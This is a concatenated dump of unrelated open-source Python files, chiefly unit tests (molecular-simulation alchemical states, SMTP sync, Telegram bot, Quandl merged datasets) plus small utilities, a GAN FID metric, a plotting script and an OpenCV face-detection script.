for state, defined_lambdas in test_cases:
kwargs = dict.fromkeys(defined_lambdas, 0.5)
alchemical_state = AlchemicalState(**kwargs)
compound_state = states.CompoundThermodynamicState(state, [alchemical_state])
system_state = AlchemicalState.from_system(compound_state.system)
assert system_state == alchemical_state
def test_lambda_properties_compound_state(self):
"""Lambda properties setters/getters work in the CompoundState system."""
test_cases = copy.deepcopy(self.test_cases)
for state, defined_lambdas in test_cases:
alchemical_state = AlchemicalState.from_system(state.system)
compound_state = states.CompoundThermodynamicState(state, [alchemical_state])
# Defined properties can be assigned and read.
for parameter_name in defined_lambdas:
assert getattr(compound_state, parameter_name) == 1.0
setattr(compound_state, parameter_name, 0.5)
assert getattr(compound_state, parameter_name) == 0.5
# System global variables are updated correctly
system_alchemical_state = AlchemicalState.from_system(compound_state.system)
for parameter_name in defined_lambdas:
assert getattr(system_alchemical_state, parameter_name) == 0.5
# Same for parameters setters.
compound_state.set_alchemical_parameters(1.0)
system_alchemical_state = AlchemicalState.from_system(compound_state.system)
for parameter_name in defined_lambdas:
assert getattr(compound_state, parameter_name) == 1.0
assert getattr(system_alchemical_state, parameter_name) == 1.0
# Same for alchemical variables setters.
compound_state.set_function_variable('lambda', 0.25)
for parameter_name in defined_lambdas:
setattr(compound_state, parameter_name, AlchemicalFunction('lambda'))
system_alchemical_state = AlchemicalState.from_system(compound_state.system)
for parameter_name in defined_lambdas:
assert getattr(compound_state, parameter_name) == 0.25
assert getattr(system_alchemical_state, parameter_name) == 0.25
    def test_set_system_compound_state(self):
        """Setting an inconsistent system in the compound state raises an error."""
alanine_state = copy.deepcopy(self.alanine_state)
alchemical_state = AlchemicalState.from_system(alanine_state.system)
compound_state = states.CompoundThermodynamicState(alanine_state, [alchemical_state])
# We create an inconsistent state that has different parameters.
incompatible_state = copy.deepcopy(alchemical_state)
incompatible_state.lambda_electrostatics = 0.5
        # Setting an inconsistent alchemical system raises an error.
system = compound_state.system
incompatible_state.apply_to_system(system)
with nose.tools.assert_raises(AlchemicalStateError):
compound_state.system = system
# Same for set_system when called with default arguments.
with nose.tools.assert_raises(AlchemicalStateError):
compound_state.set_system(system)
# This doesn't happen if we fix the state.
compound_state.set_system(system, fix_state=True)
assert AlchemicalState.from_system(compound_state.system) != incompatible_state
def test_method_compatibility_compound_state(self):
"""Compatibility between states is handled correctly in compound state."""
test_cases = [self.alanine_state, self.alanine_state_exact_pme]
# An incompatible state has a different set of defined lambdas.
full_alanine_state = copy.deepcopy(self.full_alanine_state)
alchemical_state_incompatible = AlchemicalState.from_system(full_alanine_state.system)
compound_state_incompatible = states.CompoundThermodynamicState(full_alanine_state,
[alchemical_state_incompatible])
for state in test_cases:
state = copy.deepcopy(state)
alchemical_state = AlchemicalState.from_system(state.system)
compound_state = states.CompoundThermodynamicState(state, [alchemical_state])
# A compatible state has the same defined lambda parameters,
# but their values can be different.
alchemical_state_compatible = copy.deepcopy(alchemical_state)
assert alchemical_state.lambda_electrostatics != 0.5 # Test pre-condition.
alchemical_state_compatible.lambda_electrostatics = 0.5
compound_state_compatible = states.CompoundThermodynamicState(copy.deepcopy(state),
[alchemical_state_compatible])
# Test states compatibility.
assert compound_state.is_state_compatible(compound_state_compatible)
assert not compound_state.is_state_compatible(compound_state_incompatible)
# Test context compatibility.
integrator = openmm.VerletIntegrator(1.0*unit.femtosecond)
context = compound_state_compatible.create_context(copy.deepcopy(integrator))
assert compound_state.is_context_compatible(context)
context = compound_state_incompatible.create_context(copy.deepcopy(integrator))
assert not compound_state.is_context_compatible(context)
@staticmethod
def _check_compatibility(state1, state2, context_state1, is_compatible):
"""Check the compatibility of states and contexts between 2 states."""
# Compatibility should be commutative
assert state1.is_state_compatible(state2) is is_compatible
assert state2.is_state_compatible(state1) is is_compatible
# Test context incompatibility is commutative.
context_state2 = state2.create_context(openmm.VerletIntegrator(1.0*unit.femtosecond))
assert state2.is_context_compatible(context_state1) is is_compatible
assert state1.is_context_compatible(context_state2) is is_compatible
del context_state2
def test_method_reduced_potential_compound_state(self):
"""Test CompoundThermodynamicState.reduced_potential_at_states() method.
        Computing the reduced potential for each state individually and with the
        class method should give the same result.
"""
# Build a mixed collection of compatible and incompatible thermodynamic states.
thermodynamic_states = [
copy.deepcopy(self.alanine_state),
copy.deepcopy(self.alanine_state_exact_pme)
]
alchemical_states = [
AlchemicalState(lambda_electrostatics=1.0, lambda_sterics=1.0),
AlchemicalState(lambda_electrostatics=0.5, lambda_sterics=1.0),
AlchemicalState(lambda_electrostatics=0.5, lambda_sterics=0.0),
AlchemicalState(lambda_electrostatics=1.0, lambda_sterics=1.0)
]
compound_states = []
for thermo_state in thermodynamic_states:
for alchemical_state in alchemical_states:
compound_states.append(states.CompoundThermodynamicState(
copy.deepcopy(thermo_state), [copy.deepcopy(alchemical_state)]))
# Group thermodynamic states by compatibility.
compatible_groups, _ = states.group_by_compatibility(compound_states)
assert len(compatible_groups) == 2
# Compute the reduced potentials.
expected_energies = []
obtained_energies = []
for compatible_group in compatible_groups:
# Create context.
integrator = openmm.VerletIntegrator(2.0*unit.femtoseconds)
context = compatible_group[0].create_context(integrator)
context.setPositions(self.alanine_test_system.positions[:compatible_group[0].n_particles])
# Compute with single-state method.
for state in compatible_group:
state.apply_to_context(context)
expected_energies.append(state.reduced_potential(context))
# Compute with multi-state method.
compatible_energies = states.ThermodynamicState.reduced_potential_at_states(context, compatible_group)
# The first and the last state must be equal.
assert np.isclose(compatible_energies[0], compatible_energies[-1])
obtained_energies.extend(compatible_energies)
assert np.allclose(np.array(expected_energies), np.array(obtained_energies))
def test_serialization(self):
"""Test AlchemicalState serialization alone and in a compound state."""
alchemical_state = AlchemicalState(lambda_electrostatics=0.5, lambda_angles=None)
alchemical_state.set_function_variable('lambda', 0.0)
alchemical_state.lambda_sterics = AlchemicalFunction('lambda')
# Test serialization/deserialization of AlchemicalState.
serialization = utils.serialize(alchemical_state)
deserialized_state = utils.deserialize(serialization)
original_pickle = pickle.dumps(alchemical_state)
deserialized_pickle = pickle.dumps(deserialized_state)
assert original_pickle == deserialized_pickle
# Test serialization/deserialization of AlchemicalState in CompoundState.
test_cases = [copy.deepcopy(self.alanine_state), copy.deepcopy(self.alanine_state_exact_pme)]
for thermodynamic_state in test_cases:
compound_state = states.CompoundThermodynamicState(thermodynamic_state, [alchemical_state])
# The serialized system is standard.
serialization = utils.serialize(compound_state)
serialized_standard_system = serialization['thermodynamic_state']['standard_system']
# Decompress the serialized_system
serialized_standard_system = zlib.decompress(serialized_standard_system).decode(
states.ThermodynamicState._ENCODING)
assert serialized_standard_system.__hash__() == compound_state._standard_system_hash
# The object is deserialized correctly.
deserialized_state = utils.deserialize(serialization)
assert pickle.dumps(compound_state) == pickle.dumps(deserialized_state)
# =============================================================================
# MAIN FOR MANUAL DEBUGGING
# =============================================================================
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
|
tests/test_sync.py | P-EB/aiosmtplib | 265 | 12749733 | """
Sync method tests.
"""
import pytest
from aiosmtplib.sync import async_to_sync
def test_sendmail_sync(
event_loop, smtp_client_threaded, sender_str, recipient_str, message_str
):
errors, response = smtp_client_threaded.sendmail_sync(
sender_str, [recipient_str], message_str
)
assert not errors
assert isinstance(errors, dict)
assert response != ""
def test_sendmail_sync_when_connected(
event_loop, smtp_client_threaded, sender_str, recipient_str, message_str
):
event_loop.run_until_complete(smtp_client_threaded.connect())
errors, response = smtp_client_threaded.sendmail_sync(
sender_str, [recipient_str], message_str
)
assert not errors
assert isinstance(errors, dict)
assert response != ""
def test_send_message_sync(event_loop, smtp_client_threaded, message):
errors, response = smtp_client_threaded.send_message_sync(message)
assert not errors
assert isinstance(errors, dict)
assert response != ""
def test_send_message_sync_when_connected(event_loop, smtp_client_threaded, message):
event_loop.run_until_complete(smtp_client_threaded.connect())
errors, response = smtp_client_threaded.send_message_sync(message)
assert not errors
assert isinstance(errors, dict)
assert response != ""
def test_async_to_sync_without_loop(event_loop):
async def test_func():
return 7
result = async_to_sync(test_func())
assert result == 7
def test_async_to_sync_with_exception(event_loop):
async def test_func():
raise ZeroDivisionError
with pytest.raises(ZeroDivisionError):
async_to_sync(test_func(), loop=event_loop)
@pytest.mark.asyncio
async def test_async_to_sync_with_running_loop(event_loop):
with pytest.raises(RuntimeError):
async_to_sync(None)
|
lib/python/flag_types.py | leozz37/makani | 1,178 | 12749748 | <filename>lib/python/flag_types.py
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Custom flag type definitions."""
import gflags
import numpy
def DEFINE_linspace(name, default, help_string,
nonempty=False,
increasing=False,
flag_values=gflags.FLAGS,
**kwargs): # pylint: disable=invalid-name
"""Defines a 'linspace' flag.
The flag value should be specified as <lower>,<upper>,<count>. The
components are used as arguments to numpy.linspace, so they must be
parsable as float, float, and int, respectively. The parsed flag
value will be a 1-dimensional numpy.ndarray.
Args:
name: Name of the flag.
default: Default value (as unparsed string), or None if flag is unset by
default.
help_string: Helpful description of the flag.
nonempty: Indicates whether the flag value is required to be nonempty. If
True, None is still an allowable default. Use gflags.MarkFlagAsRequired
to disallow None.
increasing: Indicates whether the flag value should be an increasing array.
This is only enforced if the parsed value has >=2 elements.
flag_values: The gflags.FlagValues object in which to define the flag.
**kwargs: See gflags.DEFINE.
"""
gflags.DEFINE(_LinspaceParser(), name, default, help_string,
flag_values=flag_values, **kwargs)
if nonempty:
# numpy.array can't be implicitly converted to a boolean.
# pylint: disable=g-explicit-length-test
gflags.RegisterValidator(name, lambda v: len(v) > 0,
'--%s must specify a nonempty range.' % name,
flag_values=flag_values)
if increasing:
gflags.RegisterValidator(name, lambda v: len(v) < 2 or v[-1] > v[0],
                             '--%s must specify an increasing range.' % name,
flag_values=flag_values)
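# Illustrative usage sketch (not part of the original module; the flag name and
# values below are hypothetical). It shows how a linspace flag is defined on a
# private FlagValues object and what the parsed value looks like.
def _example_linspace_usage(argv=('prog', '--sweep_angles=0.0,10.0,5')):
  """Defines a hypothetical linspace flag and parses an example command line."""
  flag_values = gflags.FlagValues()
  DEFINE_linspace('sweep_angles', '0.0,10.0,5', 'Angles to sweep over.',
                  nonempty=True, increasing=True, flag_values=flag_values)
  flag_values(list(argv))
  # The parsed value is a numpy.ndarray: [0., 2.5, 5., 7.5, 10.].
  return flag_values.sweep_angles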
class _LinspaceParser(gflags.ArgumentParser):
"""Parser for 'linspace' flag type."""
def Parse(self, argument):
parts = argument.split(',')
if len(parts) != 3:
raise ValueError('Wrong number of components. Must be of the form '
'<lower>,<upper>,<count>', argument)
try:
lower, upper, count = float(parts[0]), float(parts[1]), int(parts[2])
except ValueError:
raise ValueError('Bad value. Components must be parsable as float, '
'float, and int, respectively', argument)
return numpy.linspace(lower, upper, count)
def Type(self):
return numpy.ndarray
|
deeptables/fe/__init__.py | daBawse167/deeptables | 828 | 12749758 | # -*- coding:utf-8 -*-
__author__ = 'yangjian'
|
DiffAugment-biggan-imagenet/compare_gan/metrics/fid_score.py | Rian-T/data-efficient-gans | 1,902 | 12749762 | # coding=utf-8
# Copyright 2018 Google LLC & <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of the Frechet Inception Distance.
Implemented as a wrapper around the tf.contrib.gan library. The details can be
found in "GANs Trained by a Two Time-Scale Update Rule Converge to a Local Nash
Equilibrium", Heusel et al. [https://arxiv.org/abs/1706.08500].
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import logging
from compare_gan.metrics import eval_task
import tensorflow as tf
import tensorflow_gan as tfgan
# Special value returned when the FID computation raised an exception.
FID_CODE_FAILED = 4242.0
class FIDScoreTask(eval_task.EvalTask):
"""Evaluation task for the FID score."""
_LABEL = "fid_score"
def run_after_session(self, fake_dset, real_dset):
logging.info("Calculating FID.")
with tf.Graph().as_default():
fake_activations = tf.convert_to_tensor(fake_dset.activations)
real_activations = tf.convert_to_tensor(real_dset.activations)
fid = tfgan.eval.frechet_classifier_distance_from_activations(
real_activations=real_activations,
generated_activations=fake_activations)
with self._create_session() as sess:
fid = sess.run(fid)
logging.info("Frechet Inception Distance: %.3f.", fid)
return {self._LABEL: fid}
def compute_fid_from_activations(fake_activations, real_activations):
"""Returns the FID based on activations.
Args:
fake_activations: NumPy array with fake activations.
real_activations: NumPy array with real activations.
Returns:
A float, the Frechet Inception Distance.
"""
logging.info("Computing FID score.")
assert fake_activations.shape == real_activations.shape
with tf.Session(graph=tf.Graph()) as sess:
fake_activations = tf.convert_to_tensor(fake_activations)
real_activations = tf.convert_to_tensor(real_activations)
fid = tfgan.eval.frechet_classifier_distance_from_activations(
real_activations=real_activations,
generated_activations=fake_activations)
return sess.run(fid)
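# Illustrative sketch (not part of the original module): a smoke test of
# compute_fid_from_activations on randomly generated activations. The sample
# count and feature dimension below are arbitrary assumptions.
def _example_fid_from_random_activations(num_samples=64, num_features=2048):
  """Computes FID between two random activation matrices of identical shape."""
  import numpy as np
  fake_activations = np.float32(np.random.randn(num_samples, num_features))
  real_activations = np.float32(np.random.randn(num_samples, num_features))
  return compute_fid_from_activations(fake_activations, real_activations)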
|
tests/test_platform_telegram.py | romulocollopy/bottery | 250 | 12749775 | import pytest
from bottery.message import Message
from bottery.telegram import reply
from bottery.telegram.engine import TelegramChat, TelegramEngine, TelegramUser
@pytest.fixture
def engine():
return TelegramEngine
@pytest.fixture
def user():
return TelegramUser
@pytest.fixture
def chat():
return TelegramChat
@pytest.fixture()
def message():
return Message(
id=1,
platform='telegram',
text='',
user=user,
chat=chat,
timestamp='',
raw='',
)
@pytest.fixture
def message_data():
return {
'message': {
'chat': {
'first_name': 'John',
'id': 12345678,
'last_name': 'Snow',
'type': 'private',
'username': 'johnsnow'
},
'date': 1516787847,
'from': {
'first_name': 'John',
'id': 12345678,
'is_bot': False,
'language_code': 'en-US',
'last_name': 'Snow',
'username': 'johnsnow'
},
'message_id': 2,
'text': 'Hi bot, how are you?'
},
'update_id': 987456321
}
@pytest.fixture
def edited_message_data(message_data):
return {'edited_message': message_data['message']}
@pytest.mark.parametrize('chat_type,id_expected', [
('group', 456),
('private', 123),
])
def test_platform_telegram_engine_get_chat_id(chat_type,
id_expected, engine, message):
setattr(message.chat, 'id', id_expected)
setattr(message.chat, 'type', chat_type)
setattr(message.user, 'id', id_expected)
assert engine.get_chat_id(engine, message) == id_expected
@pytest.mark.parametrize('message_input,message_key,message_edited', [
(pytest.lazy_fixture('message_data'), 'message', False),
(pytest.lazy_fixture('edited_message_data'), 'edited_message', True)
])
def test_build_message(engine, message_input, message_key, message_edited):
message = engine.build_message(engine, message_input)
assert message.id == message_input[message_key]['message_id']
assert message.text == message_input[message_key]['text']
assert message.timestamp == message_input[message_key]['date']
assert message.raw == message_input
assert message.edited == message_edited
def test_build_message_without_text(message_data, engine):
'''
Telegram can send a message without text.
For example, when a bot is added to a group.
'''
message_data_without_text = message_data
del message_data_without_text['message']['text']
message = engine.build_message(engine, message_data_without_text)
assert message.id == message_data_without_text['message']['message_id']
assert message.text is not None
assert message.text == ''
assert message.timestamp == message_data_without_text['message']['date']
assert message.raw == message_data
def test_reply_decorator(message):
@reply()
def view(message):
return ''
view(message)
assert message._request_payload['reply_to_message_id'] == message.id
def test_reply_decorator_to_previous_message(message):
@reply(to=lambda message: message.id - 2)
def view(message):
return ''
view(message)
assert message._request_payload['reply_to_message_id'] == message.id - 2
|
validation_tests/analytical_exact/transcritical_without_shock/plot_results.py | samcom12/anuga_core | 136 | 12749788 | <gh_stars>100-1000
"""
Quick plot for the outputs of transcritical flow without shock
"""
import anuga.utilities.plot_utils as util
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as pyplot
from analytical_without_shock import *
from numpy import ones
p_st = util.get_output('transcritical.sww')
p2_st=util.get_centroids(p_st)
v = p2_st.y[10]
v2=(p2_st.y==v)
h,z = analytic_sol(p2_st.x[v2])
tid = 100
#Plot the stages##############################################################
pyplot.clf()
pyplot.plot(p2_st.x[v2], p2_st.stage[tid,v2], 'b.-', label='numerical stage') # 0*T/6
pyplot.plot(p2_st.x[v2], h+z,'r-', label='analytical stage')
pyplot.plot(p2_st.x[v2], z,'k-', label='bed elevation')
pyplot.title('Stage at time %s secs'% p2_st.time[tid])
##pyplot.ylim(-5.0,5.0)
pyplot.legend(loc='best')
pyplot.xlabel('Xposition')
pyplot.ylabel('Stage')
pyplot.savefig('stage_plot.png')
#Plot the momentums##########################################################
pyplot.clf()
pyplot.plot(p2_st.x[v2], p2_st.xmom[tid,v2], 'b.-', label='numerical') # 0*T/6
pyplot.plot(p2_st.x[v2], 1.53*ones(len(p2_st.x[v2])),'r-', label='analytical')
pyplot.title('Xmomentum at time %s secs'% p2_st.time[tid])
pyplot.legend(loc='best')
pyplot.ylim([1.52,1.54])
pyplot.xlabel('Xposition')
pyplot.ylabel('Xmomentum')
pyplot.savefig('xmom_plot.png')
#Plot the velocities#########################################################
pyplot.clf()
pyplot.plot(p2_st.x[v2], p2_st.xvel[tid,v2], 'b.-', label='numerical') # 0*T/6
pyplot.plot(p2_st.x[v2], 1.53/h,'r-', label='analytical')
pyplot.title('Xvelocity at time %s secs'% p2_st.time[tid])
pyplot.legend(loc='best')
pyplot.xlabel('Xposition')
pyplot.ylabel('Xvelocity')
pyplot.savefig('xvel_plot.png')
|
main.py | pumon/untouched | 906 | 12749794 | <reponame>pumon/untouched
import argparse
import glob
import os
import time
import cv2
import imutils
from imutils.object_detection import non_max_suppression
subject_label = 1
font = cv2.FONT_HERSHEY_SIMPLEX
list_of_videos = []
cascade_path = "face_cascades/haarcascade_profileface.xml"
face_cascade = cv2.CascadeClassifier(cascade_path)
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
recognizer = cv2.face.LBPHFaceRecognizer_create()
count = 0
def detect_people(frame):
"""
detect humans using HOG descriptor
Args:
frame:
Returns:
processed frame
"""
(rects, weights) = hog.detectMultiScale(frame, winStride=(8, 8), padding=(16, 16), scale=1.06)
rects = non_max_suppression(rects, probs=None, overlapThresh=0.65)
for (x, y, w, h) in rects:
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)
return frame
def detect_face(frame):
"""
detect human faces in image using haar-cascade
Args:
frame:
Returns:
coordinates of detected faces
"""
faces = face_cascade.detectMultiScale(frame, 1.1, 2, 0, (20, 20))
return faces
def recognize_face(frame_orginal, faces):
"""
recognize human faces using LBPH features
Args:
frame_orginal:
faces:
Returns:
label of predicted person
"""
predict_label = []
predict_conf = []
for x, y, w, h in faces:
frame_orginal_grayscale = cv2.cvtColor(frame_orginal[y: y + h, x: x + w], cv2.COLOR_BGR2GRAY)
cv2.imshow("cropped", frame_orginal_grayscale)
predict_tuple = recognizer.predict(frame_orginal_grayscale)
a, b = predict_tuple
predict_label.append(a)
predict_conf.append(b)
        print("Prediction label, confidence: " + str(predict_tuple))
return predict_label
def draw_faces(frame, faces):
"""
draw rectangle around detected faces
Args:
frame:
faces:
Returns:
face drawn processed frame
"""
for (x, y, w, h) in faces:
xA = x
yA = y
xB = x + w
yB = y + h
cv2.rectangle(frame, (xA, yA), (xB, yB), (0, 255, 0), 2)
return frame
def put_label_on_face(frame, faces, labels):
"""
draw label on faces
Args:
frame:
faces:
labels:
Returns:
processed frame
"""
i = 0
for x, y, w, h in faces:
cv2.putText(frame, str(labels[i]), (x, y), font, 1, (255, 255, 255), 2)
i += 1
return frame
def background_subtraction(previous_frame, frame_resized_grayscale, min_area):
"""
    This function returns 1 for frames in which the changed area relative to
    the previous frame is greater than the minimum area defined.
    Thus the expensive computation of human detection, face detection
    and face recognition is not done on every frame.
    Only the frames undergoing a significant amount of change (controlled by min_area)
    are processed for detection and recognition.
"""
frameDelta = cv2.absdiff(previous_frame, frame_resized_grayscale)
thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]
thresh = cv2.dilate(thresh, None, iterations=2)
im2, cnts, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
temp = 0
for c in cnts:
# if the contour is too small, ignore it
if cv2.contourArea(c) > min_area:
temp = 1
return temp
if __name__ == '__main__':
"""
main function
"""
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--videos", required=True, help="path to videos directory")
args = vars(ap.parse_args())
path = args["videos"]
for f in os.listdir(path):
list_of_videos = glob.glob(os.path.join(os.path.abspath(path), f))
print(os.path.join(os.path.abspath(path), f) + "*.mp4")
print(list_of_videos)
if os.path.exists("model.yaml"):
recognizer.read("model.yaml")
for video in list_of_videos:
camera = cv2.VideoCapture(os.path.join(path, video))
grabbed, frame = camera.read()
print(frame.shape)
frame_resized = imutils.resize(frame, width=min(800, frame.shape[1]))
frame_resized_grayscale = cv2.cvtColor(frame_resized, cv2.COLOR_BGR2GRAY)
print(frame_resized.shape)
            # defining min cutoff area
min_area = (3000 / 800) * frame_resized.shape[1]
while True:
starttime = time.time()
previous_frame = frame_resized_grayscale
grabbed, frame = camera.read()
if not grabbed:
break
frame_resized = imutils.resize(frame, width=min(800, frame.shape[1]))
frame_resized_grayscale = cv2.cvtColor(frame_resized, cv2.COLOR_BGR2GRAY)
temp = background_subtraction(previous_frame, frame_resized_grayscale, min_area)
if temp == 1:
frame_processed = detect_people(frame_resized)
faces = detect_face(frame_resized_grayscale)
if len(faces) > 0:
frame_processed = draw_faces(frame_processed, faces)
label = recognize_face(frame_resized, faces)
frame_processed = put_label_on_face(frame_processed, faces, label)
cv2.imshow("Detected Human and face", frame_processed)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
endtime = time.time()
                    print("Time to process a frame: " + str(endtime - starttime))
else:
count = count + 1
                    print("Number of frames skipped in the video = " + str(count))
camera.release()
cv2.destroyAllWindows()
else:
print("model file not found")
list_of_videos = []
|
fixit/cli/utils.py | sk-/Fixit | 313 | 12749795 | <filename>fixit/cli/utils.py
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
def print_color(code: int, message: str) -> None:
print(f"\033[{code}m{message}\033[00m")
def print_green(message: str) -> None:
print_color(92, message)
def print_yellow(message: str) -> None:
print_color(93, message)
def print_cyan(message: str) -> None:
print_color(96, message)
def print_red(message: str) -> None:
print_color(91, message)
def snake_to_camelcase(name: str) -> str:
"""Convert snake-case string to camel-case string."""
return "".join(n.capitalize() for n in name.split("_"))
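# For example (hypothetical rule name), snake_to_camelcase("avoid_or_enum")
# returns "AvoidOrEnum"; a single word such as "utils" becomes "Utils".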
|
test/test_merged_dataset.py | alexanu/quandl-python | 1,178 | 12749822 | import unittest
from test.helpers.httpretty_extension import httpretty
import six
import datetime
import pandas
from quandl.model.dataset import Dataset
from quandl.model.data import Data
from quandl.model.merged_data_list import MergedDataList
from quandl.model.merged_dataset import MergedDataset
from mock import patch, call
from quandl.errors.quandl_error import ColumnNotFound
from test.helpers.merged_datasets_helper import setupDatasetsTest
class GetMergedDatasetTest(unittest.TestCase):
@classmethod
def setUp(self):
setupDatasetsTest(self, httpretty)
@classmethod
def tearDownClass(cls):
httpretty.disable()
httpretty.reset()
@patch('quandl.model.merged_dataset.MergedDataset._build_dataset_object')
def test_merged_dataset_calls_merged_dataset_get_dataset(self, mock):
mock.return_value = self.oil_obj
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
md.data_fields()
expected_calls = [
call(('NSE/OIL', {'column_index': [1, 2]})),
call(('WIKI/AAPL', {'column_index': [1]})),
call('WIKI/MSFT')
]
self.assertEqual(mock.call_count, 3)
for index, expected in enumerate(expected_calls):
self.assertEqual(mock.mock_calls[index], expected)
@patch('quandl.model.merged_dataset.MergedDataset._build_dataset_object')
def test_removes_column_index_query_param(self, mock):
self.oil_obj.requested_column_indexes = []
mock.return_value = self.oil_obj
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]})], params={'column_index': 1})
md.data_fields()
expected = call(('NSE/OIL', {'column_index': [1, 2]}), params={})
self.assertEqual(mock.call_args, expected)
def test_sets_dataset_codes_for_the_datasets(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
self.assertEqual(md._datasets, None)
six.assertCountEqual(self, [1, 2], md.dataset_codes[0][1]['column_index'])
six.assertCountEqual(self, [1], md.dataset_codes[1][1]['column_index'])
self.assertEqual('I', md.dataset_codes[2][1])
def test_sets_column_index_on_each_dataset(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
md.data_fields()
six.assertCountEqual(self, [1, 2], md._datasets[0].requested_column_indexes)
six.assertCountEqual(self, [1], md._datasets[1].requested_column_indexes)
six.assertCountEqual(self, [], md._datasets[2].requested_column_indexes)
def test_merged_dataset_column_names(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
expected = [six.u('Date'), six.u('NSE/OIL - column.1'),
six.u('NSE/OIL - column.2'),
six.u('WIKI/AAPL - column.1'),
six.u('WIKI/MSFT - column.1'),
six.u('WIKI/MSFT - column.2'),
six.u('WIKI/MSFT - column.3')]
six.assertCountEqual(self, md.column_names, expected)
def test_merged_dataset_oldest_available_date(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
self.assertEqual(md.oldest_available_date, datetime.date(2013, 1, 1))
def test_merged_dataset_newest_available_date(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
self.assertEqual(md.newest_available_date, datetime.date(2015, 7, 30))
def test_merged_dataset_database_codes(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
six.assertCountEqual(self, md.database_code, ['NSE', 'WIKI'])
def test_merged_dataset_dataset_codes(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
six.assertCountEqual(self,
md.dataset_code, ['OIL', 'AAPL', 'MSFT'])
def test_get_returns_merged_dataset_obj(self):
md = MergedDataset(['NSE/OIL'])
self.assertIsInstance(md, MergedDataset)
def test_raise_error_when_datasets_arg_not_list(self):
self.assertRaises(ValueError, lambda: MergedDataset('NSE/OIL').data_fields())
def test_raise_error_when_datasets_arg_list_has_invalid_type(self):
self.assertRaises(
ValueError, lambda: MergedDataset(['NSE/OIL', {'blah': [1]}]).data_fields())
def test_raise_error_when_column_index_specified_and_not_list(self):
self.assertRaises(ValueError, lambda: MergedDataset(
[('NSE/OIL', {'column_index': 'foo'})]).data_fields())
def test_raise_error_when_column_index_greater_than_max(self):
self.assertRaises(
ColumnNotFound, lambda: MergedDataset([('NSE/OIL', {'column_index': [1, 10]})]).data())
def test_raise_error_when_column_index_less_than_one(self):
self.assertRaises(
ColumnNotFound, lambda: MergedDataset([('NSE/OIL', {'column_index': [0, 1]})]).data())
@patch.object(Dataset, 'data')
def test_when_only_one_column_requested_adds_column_index_query_param(self, mock_method):
mock_method.return_value = self.data_list_obj
MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')]).data(params={'start_date': '2015-07-01'})
expected_calls = [call(params={'start_date': '2015-07-01'}),
call(params={'column_index': 1, 'start_date': '2015-07-01'}),
call(params={'start_date': '2015-07-01'})]
self.assertEqual(mock_method.mock_calls[0], expected_calls[0])
self.assertEqual(mock_method.mock_calls[1], expected_calls[1])
self.assertEqual(mock_method.mock_calls[2], expected_calls[2])
@patch.object(Dataset, 'data')
def test_data_forwards_requests_to_datset_data(self, mock_method):
mock_method.return_value = self.data_list_obj
MergedDataset(
['NSE/OIL', 'WIKI/AAPL',
'WIKI/MSFT']).data(params={'start_date': '2015-07-01'})
self.assertEqual(mock_method.call_count, 3)
for actual in mock_method.mock_calls:
self.assertEqual(actual, call(params={'start_date': '2015-07-01'}))
def test_get_merged_dataset_data_returns_correct_types(self):
data = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')]).data()
self.assertIsInstance(data, MergedDataList)
self.assertIsInstance(data[0], Data)
def test_get_merged_dataset_creates_merged_pandas_dataframe(self):
data = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')]).data()
self.assertIsInstance(data.to_pandas(), pandas.core.frame.DataFrame)
def test_get_merged_dataset_data_returns_specified_columns(self):
data = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('SINGLE/COLUMN', {'column_index': [1]}),
('WIKI/MSFT')]).data()
actual = data.to_pandas().columns.tolist()
